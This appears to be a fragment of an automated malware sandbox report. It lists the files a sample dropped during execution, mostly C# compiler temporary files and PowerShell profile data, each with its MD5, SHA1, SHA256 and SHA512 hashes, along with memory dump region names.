| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
memory/2752-155-0x00007FFDF9760000-0x00007FFDFA221000-memory.dmp
memory/2752-156-0x00000239B67B0000-0x00000239B67B2000-memory.dmp
memory/2752-157-0x00000239B67B3000-0x00000239B67B5000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | feadc4e1a70c13480ef147aca0c47bc0 |
| SHA1 | d7a5084c93842a290b24dacec0cd3904c2266819 |
| SHA256 | 5b4f1fe7ba74b245b6368dbe4ceffa438f14eef08ba270e9a13c57505c7717ac |
| SHA512 | c9681a19c773891808fefa9445cea598d118c83bba89530a51ab993adbff39bce72b43f8e99d0c68e4a44f7e0f4c8ec128641c45cd557a8e1215721d5d992a23 |
\??\c:\Users\Admin\AppData\Local\Temp\yduppq40\yduppq40.cmdline
| MD5 | d9b84d1bedd2ddccb9eff29469b5ca23 |
| SHA1 | 4a008025e90fdb0b71a4bfdb2244f78521f9616f |
| SHA256 | ca5719fd89f44f57a5d84fcb69c6187f8246826dafe9b424bfa668616df04d68 |
| SHA512 | a85673dc719f1a40a682bf20bbc28d897fba1789e6a7c9442cd67c2389285ae000b4e9d435cc8a8483fe4e3185b366c97e4d45f384a3bdd2868ab328c02a6c04 |
\??\c:\Users\Admin\AppData\Local\Temp\yduppq40\yduppq40.0.cs
| MD5 | 7fceb996f934e8bda687cdd2bd46a9a7 |
| SHA1 | 81e1edbcca6438daaccc3845fa0e3b1a6cff17a6 |
| SHA256 | fa53f8174510a9ad008973d47798f022b681e1764a15134efd2004980f23bb6e |
| SHA512 | 6aa6253527b72c0605859180887ff19cd96412cb816ec02e832d4a0e0cbcd03d9cc580112e4e2055d4a9ede850c1a339df974371f992b0b9b73e54e137610205 |
\??\c:\Users\Admin\AppData\Local\Temp\yduppq40\CSC1C2BCD08D0674F4EBB14B4F82C2728A0.TMP
| MD5 | a71a02ee123c1527fbf22cf4d5f4bbcd |
| SHA1 | d06066ba2b5b2e4fab8b2525256101107bbea75d |
| SHA256 | da37e4a2f0448cc7b1d5838c84de8d9d8c97ce30ae78a8563b3cbb512d40a4e2 |
| SHA512 | 0316e4f51b4b2fb663a6457f0fc5510401738a3a82588f732cb41bff497371b82200d9a3a6ced1b3fce1976b09a5ffe51e2ccd792a6f04df4f284d6d3a936ab1 |
C:\Users\Admin\AppData\Local\Temp\RESD4FC.tmp
| MD5 | 18d385382c9cef05ab2fb59ef2179f38 |
| SHA1 | 34a8a72dac898afcccec131c6485c0b664a65bf9 |
| SHA256 | 552e55b48034a4d0372ab19987b01324fe8de4abc48df19f28189912dbb78b1e |
| SHA512 | af68a99b9f31c3339c53a03288c3501ab4f540673572e3fd62ba4f0023fc9c1d8b0c7272acd3c2ec17368cf7748f2aef95203f93f4cefa04c1e4153f6ab917b7 |
C:\Users\Admin\AppData\Local\Temp\yduppq40\yduppq40.dll
| MD5 | c7e0ce7c250bc52d8ed97a410cfa8ab4 |
| SHA1 | 1282eba2b5e561dc1b26ba24fa7ce8b744edfea9 |
| SHA256 | 339b677126b8d37d50f246811595f9915f1f6588618f4cba03265eeb245b4834 |
| SHA512 | c18e1536068463ce6ce8edc5804f1b653f9adfb3b8e7382fa86814891abb09c84eb7051d4c13c4b06a1623747cbdf3aa3ecb284eecc199d38c173bb82390467d |
\??\c:\Users\Admin\AppData\Local\Temp\gkonnpn0\gkonnpn0.cmdline
| MD5 | 108e007a6ad4048d2b446eff65bd71e8 |
| SHA1 | ecc2f4d2491aae9d083b9e69bc77fbed5249c007 |
| SHA256 | adeaf88bb60f5dc7d3a24e0a78b2f7398e5c2e7834a7c1e476add0fc12bdbba8 |
| SHA512 | 49671fbc673d147f0c76cca350207db8b0bf0a0d8ba2fa966a8c9614d808417db298df163ce6bc51d03d1c94d4b95c7a0e30a8f91c23bccf5a3e41c5ae9899e1 |
\??\c:\Users\Admin\AppData\Local\Temp\gkonnpn0\gkonnpn0.0.cs
| MD5 | 697f16b8c6892082559d8a17db343865 |
| SHA1 | 246d6ba1419478be7915e78b61525da894321fb9 |
| SHA256 | 518ab091348dea4f49183958185b3d42b5ddb191007bab25b6e69ff6ec923f1f |
| SHA512 | 801a428c5dd5ff4a745923914505dcf5a9929b3dbfc5bb5f6320996ad849fa42dc75ac53a432dd01103e0d6db2269583351f14b189a76a066d6f940ff79d38d6 |
\??\c:\Users\Admin\AppData\Local\Temp\gkonnpn0\CSCFBE45FDC2F347C08385E222A1869041.TMP
| MD5 | 0829765fc0fea14feccd7f9aee983897 |
| SHA1 | 5a35f111e627591248ce26d1e15ecacf57465f1b |
| SHA256 | 5136e1c6b8a9c1e866fc944d35db273608866cb042179087b92779c0498b0bfd |
| SHA512 | d7e9633e68ac5d16ac2b666f360ae6be5ace4f6a1bb7d67a6668ef113342cc2acb8aab3ce910b6e798e0a2a72828ba783a675b1597217b1125b631549b1099e9 |
C:\Users\Admin\AppData\Local\Temp\RESD692.tmp
| MD5 | 98090b034d332c533789e4435166c7d3 |
| SHA1 | 19af81eccc15398b6f3825763d8c38b27a76ff31 |
| SHA256 | d4f30f15368d279f471981b8c03ba05d185a4414241b22e9496e86360a56fde4 |
| SHA512 | b8d7d8456530b94f9aa4d48fd582755afd2e24be7156d4a8a318ade843d9f5cc82dada745c3ccf97cf444f1cb78b0c4a4f06109c1bc719fd3e293ef25cf9a644 |
C:\Users\Admin\AppData\Local\Temp\gkonnpn0\gkonnpn0.dll
| MD5 | 08639db717fd568cbbf83b8951853e0a |
| SHA1 | 759dfe3cbefcec767c301fa33af3fd1b3c1ba5d4 |
| SHA256 | 5ae518ed2a7f968060731bc62e8893ba69756dfc9f489f99485e6b08e3e29f23 |
| SHA512 | 741724a30ba70ad65eeed822a4d40d634b33e15072a2ce6ab8dbcac2863b310f231a1f5bb817af83c10b6442790cecba13c760098792e4c1a2fb8091026eba60 |
memory/1276-169-0x00000244F8EB0000-0x00000244F8EC3000-memory.dmp
memory/444-170-0x00000000001C0000-0x00000000001CE000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 9856eec246073417aba7c4e517d16d0b |
| SHA1 | ce495a8b86044e11eaf50cc89a92116cc9b13724 |
| SHA256 | 0ed72f3f9a4847fc67fe0d6dc44d1773b8a652aaaf84352440b44da59a66d7f8 |
| SHA512 | 8227671cae6eb7e5d2f77e82656c9099efb0e59b9478a7884216e83bc2be8c11ae2cbdea1c9137da263825c3a8357321fc5c931841020596cdd82ca42489f16e |
memory/2996-172-0x0000000000B00000-0x0000000000B15000-memory.dmp
memory/2996-173-0x0000000007F50000-0x0000000007F65000-memory.dmp